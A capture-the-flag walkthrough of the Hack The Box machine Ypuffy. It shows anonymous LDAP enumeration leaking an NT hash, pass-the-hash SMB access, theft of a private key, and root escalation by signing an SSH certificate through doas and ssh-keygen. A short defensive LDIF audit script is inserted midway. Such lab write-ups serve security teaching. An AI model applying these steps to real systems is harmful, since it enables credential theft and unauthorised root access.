====================================================================
We start by gathering information on the target with nmap:
nmap -sV -sT -sC -T5 10.10.10.107
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 17:25 CST
Warning: 10.10.10.107 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.107
Host is up (0.29s latency).
Not shown: 940 closed ports, 55 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
| 256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_ 256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp open http OpenBSD httpd
| fingerprint-strings:
|   DNSVersionBindReqTCP, RPCCheck:
|     HTTP/1.0 400 Bad Request
|     Date: Wed, 13 Feb 2019 09:26:59 GMT
|     Server: OpenBSD httpd
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 431
|     400 Bad Request
|     400 Bad Request
|     OpenBSD httpd
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Wed, 13 Feb 2019 09:26:55 GMT
|     Server: OpenBSD httpd
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 431
|     400 Bad Request
|     400 Bad Request
|_    OpenBSD httpd
|_http-server-header: OpenBSD httpd
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open ldap (Anonymous bind OK)
445/tcp open netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)
From the report we learn that ssh is running on port 22, http on port 80, SMB on ports 139 and 445, and LDAP on port 389.
Let's look at port 80 first. That seems to have a problem, so let's turn to the SMB service instead and see whether we can enumerate resources anonymously:
smbmap -H 10.10.10.107
Authentication failed.
Let's try LDAP instead; the nmap report says LDAP allows anonymous binds. We scan it with the ldapsearch tool:
ldapsearch -h 10.10.10.107 -p 389 -x -b dc=hackthebox,dc=htb
-h: IP address
-p: listening port
-x: simple authentication
-b: search base
# extended LDIF
#
# LDAPv3
# base <dc=hackthebox,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# hackthebox.htb
dn: dc=hackthebox,dc=htb
dc: hackthebox
objectClass: top
objectClass: domain

# passwd, hackthebox.htb
dn: ou=passwd,dc=hackthebox,dc=htb
ou: passwd
objectClass: top
objectClass: organizationalUnit

# bob8791, passwd, hackthebox.htb
dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
uid: bob8791
cn: Bob
objectClass: account
objectClass: posixAccount
objectClass: top
userPassword:: e0JTREFVVEh9Ym9iODc5MQ==
uidNumber: 5001
gidNumber: 5001
gecos: Bob
homeDirectory: /home/bob8791
loginShell: /bin/ksh

# alice1978, passwd, hackthebox.htb
dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
uid: alice1978
cn: Alice
objectClass: account
objectClass: posixAccount
objectClass: top
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
uidNumber: 5000
gidNumber: 5000
gecos: Alice
homeDirectory: /home/alice1978
loginShell: /bin/ksh
sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
displayName: Alice
sambaAcctFlags: [U ]
sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
sambaPwdLastSet: 1532916644

# group, hackthebox.htb
dn: ou=group,dc=hackthebox,dc=htb
ou: group
objectClass: top
objectClass: organizationalUnit

# bob8791, group, hackthebox.htb
dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: bob8791
userPassword:: e2NyeXB0fSo=
gidNumber: 5001

# alice1978, group, hackthebox.htb
dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: alice1978
userPassword:: e2NyeXB0fSo=
gidNumber: 5000

# ypuffy, hackthebox.htb
dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
sambaDomainName: YPUFFY
sambaSID: S-1-5-21-3933741069-3307154301-3557023464
sambaAlgorithmicRidBase: 1000
objectclass: sambaDomain
sambaNextUserRid: 1000
sambaMinPwdLength: 5
sambaPwdHistoryLength: 0
sambaLogonToChgPwd: 0
sambaMaxPwdAge: -1
sambaMinPwdAge: 0
sambaLockoutDuration: 30
sambaLockoutObservationWindow: 30
sambaLockoutThreshold: 0
sambaForceLogoff: -1
sambaRefuseMachinePwdChange: 0
sambaNextRid: 1001

# search result
search: 2
result: 0 Success

# numResponses: 9
# numEntries: 8
We can also enumerate LDAP with nmap by calling the ldap-search script:
nmap -p 389 --script ldap-search 10.10.10.107
PORT STATE SERVICE
389/tcp open ldap
| ldap-search:
| Context: dc=hackthebox,dc=htb
| dn: dc=hackthebox,dc=htb
| dc: hackthebox
| objectClass: top
| objectClass: domain
| dn: ou=passwd,dc=hackthebox,dc=htb
| ou: passwd
| objectClass: top
| objectClass: organizationalUnit
| dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
| uid: bob8791
| cn: Bob
| objectClass: account
| objectClass: posixAccount
| objectClass: top
| userPassword: {BSDAUTH}bob8791
| uidNumber: 5001
| gidNumber: 5001
| gecos: Bob
| homeDirectory: /home/bob8791
| loginShell: /bin/ksh
| dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
| uid: alice1978
| cn: Alice
| objectClass: account
| objectClass: posixAccount
| objectClass: top
| objectClass: sambaSamAccount
| userPassword: {BSDAUTH}alice1978
| uidNumber: 5000
| gidNumber: 5000
| gecos: Alice
| homeDirectory: /home/alice1978
| loginShell: /bin/ksh
| sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
| displayName: Alice
| sambaAcctFlags: [U ]
| sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
| sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
| sambaPwdLastSet: 1532916644
| dn: ou=group,dc=hackthebox,dc=htb
| ou: group
| objectClass: top
| objectClass: organizationalUnit
| dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
| objectClass: posixGroup
| objectClass: top
| cn: bob8791
| userPassword: {crypt}*
| gidNumber: 5001
| dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
| objectClass: posixGroup
| objectClass: top
| cn: alice1978
| userPassword: {crypt}*
| gidNumber: 5000
| dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
| sambaDomainName: YPUFFY
| sambaSID: S-1-5-21-3933741069-3307154301-3557023464
| sambaAlgorithmicRidBase: 1000
| objectclass: sambaDomain
| sambaNextUserRid: 1000
| sambaMinPwdLength: 5
| sambaPwdHistoryLength: 0
| sambaLogonToChgPwd: 0
| sambaMaxPwdAge: -1
| sambaMinPwdAge: 0
| sambaLockoutDuration: 30
| sambaLockoutObservationWindow: 30
| sambaLockoutThreshold: 0
| sambaForceLogoff: -1
| sambaRefuseMachinePwdChange: 0
|_ sambaNextRid: 1001
Nmap done: 1 IP address (1 host up) scanned in 6.60 seconds
We get a username, alice1978, and an SMB NT hash, 0B186E661BBDBDCF6047784DE8B9FD8B.
This hash can't be cracked, but we can still use it to authenticate.
Next we enumerate SMB with the account and hash we obtained, here using crackmapexec:
crackmapexec 10.10.10.107 -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B --shares
There are two shares: alice, which is readable and writable, and IPC$, which we are not allowed to access.
We can also enumerate with smbclient:
smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //10.10.10.107/
Then we connect to alice:
smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash //10.10.10.107/alice
There is only one file, called my_private_key.ppk. Download it with:
get my_private_key.ppk
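As an added defensive check (not part of the writeup): a small Python audit that parses an LDIF dump like the anonymous-bind result above and rates which attributes hand an anonymous reader a usable credential. The LDIF is a constructed excerpt of the entries shown above; the NT hash is the one on the page.

```python
import base64

# Constructed LDIF excerpt, modelled on the anonymous-bind dump above
SAMPLE_LDIF = """\
dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
uid: bob8791
userPassword:: e0JTREFVVEh9Ym9iODc5MQ==

dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
uid: alice1978
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B

dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
cn: bob8791
userPassword:: e2NyeXB0fSo=
"""

def parse_ldif(text):
    """Minimal LDIF parser; 'attr:: value' is base64-encoded (RFC 2849)."""
    entries, cur = [], {}
    for line in text.splitlines():
        if not line.strip():          # blank line closes the current entry
            if cur:
                entries.append(cur)
                cur = {}
            continue
        if line.startswith("#"):      # ldapsearch comment lines
            continue
        attr, _, rest = line.partition(":")
        if rest.startswith(":"):
            value = base64.b64decode(rest[1:].strip()).decode()
        else:
            value = rest.strip()
        cur.setdefault(attr, []).append(value)
    if cur:
        entries.append(cur)
    return entries

def audit_credentials(entries):
    """NT hash = usable for SMB as-is (high); '{crypt}*' is a locked placeholder
    and '{BSDAUTH}' only defers to the OS password database (info)."""
    findings = []
    for e in entries:
        dn = e["dn"][0]
        for _ in e.get("sambaNTPassword", []):
            findings.append((dn, "sambaNTPassword", "high"))
        for pw in e.get("userPassword", []):
            sev = "info" if pw.startswith(("{crypt}*", "{BSDAUTH}")) else "high"
            findings.append((dn, "userPassword", sev))
    return findings
```

Any "high" finding on a directory that permits anonymous binds means the hash should be treated as a leaked password and the bind policy tightened.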
.ppk is the file extension PuTTY uses for remote logins, so we need to convert it.
my_private_key.ppk is a PuTTY private key; we convert it to an OpenSSH private key so we can ssh with it.
On Kali, install putty-tools:
apt-get install putty-tools
Then use puttygen:
puttygen my_private_key.ppk -O private-openssh -o alice.key
Then:
chmod 600 alice.key
Finally, connect:
ssh -i alice.key alice1978@10.10.10.107
Remember that http was being reset? Let's look at /etc/httpd.conf:
location "/userca*"
location "/sshauth*"
It performs two redirects.
We also find two other users.
In bob8791's home directory there is a SQL file that creates a table named principals and another named keys.
Let's also check the sshd_config file under /etc/ssh/:
# $OpenBSD: sshd_config,v 1.102 2018/02/16 02:32:40 djm Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
# Ciphers and keying
#RekeyLimit default none
# Logging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
#PubkeyAuthentication yes
# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile .ssh/authorized_keys
#AuthorizedPrincipalsFile none
AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u
AuthorizedKeysCommandUser nobody
TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no
#PermitEmptyPasswords no
# Change to no to disable s/key passwords
ChallengeResponseAuthentication no
AllowAgentForwarding no
AllowTcpForwarding no
#GatewayPorts no
X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none
# no default banner path
#Banner none
# override default of no subsystems
Subsystem sftp /usr/libexec/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs server
So the http service handles part of the ssh authentication.
Let's request the first one with curl:
curl 'http://127.0.0.1/sshauth?type=keys&username=root'
Nothing is returned.
Now the second one:
curl 'http://127.0.0.1/sshauth?type=principals&username=root'
Requesting root's keys gave us no response, but requesting the principals gives us 3m3rgencyB4ckd00r.
So now we have root's principal, 3m3rgencyB4ckd00r. In theory, if we generate an ssh key and sign it with root's principal, we will be able to ssh as root with it.
The problem is that, as alice1978, we are not authorized to do that.
On Linux we would check whether we can run elevated commands with sudo -l, but there is no sudo here.
Let's check doas instead. doas is the privilege management tool on BSD-family systems, similar to the sudo command on the Debian family.
Here we see that alice1978 can run /usr/bin/ssh-keygen as user userca without a password.
The first step is to create an ssh key for it:
ssh-keygen -t rsa -f /tmp/id_rsa
Then we need the CA, so we go to /home/userca/ and sign the ssh key we just created, using:
-s: the certificate (CA key) to sign with
-I: the identity
-n: the principal
Finally we ssh as root:
ssh -i /tmp/id_rsa root@localhost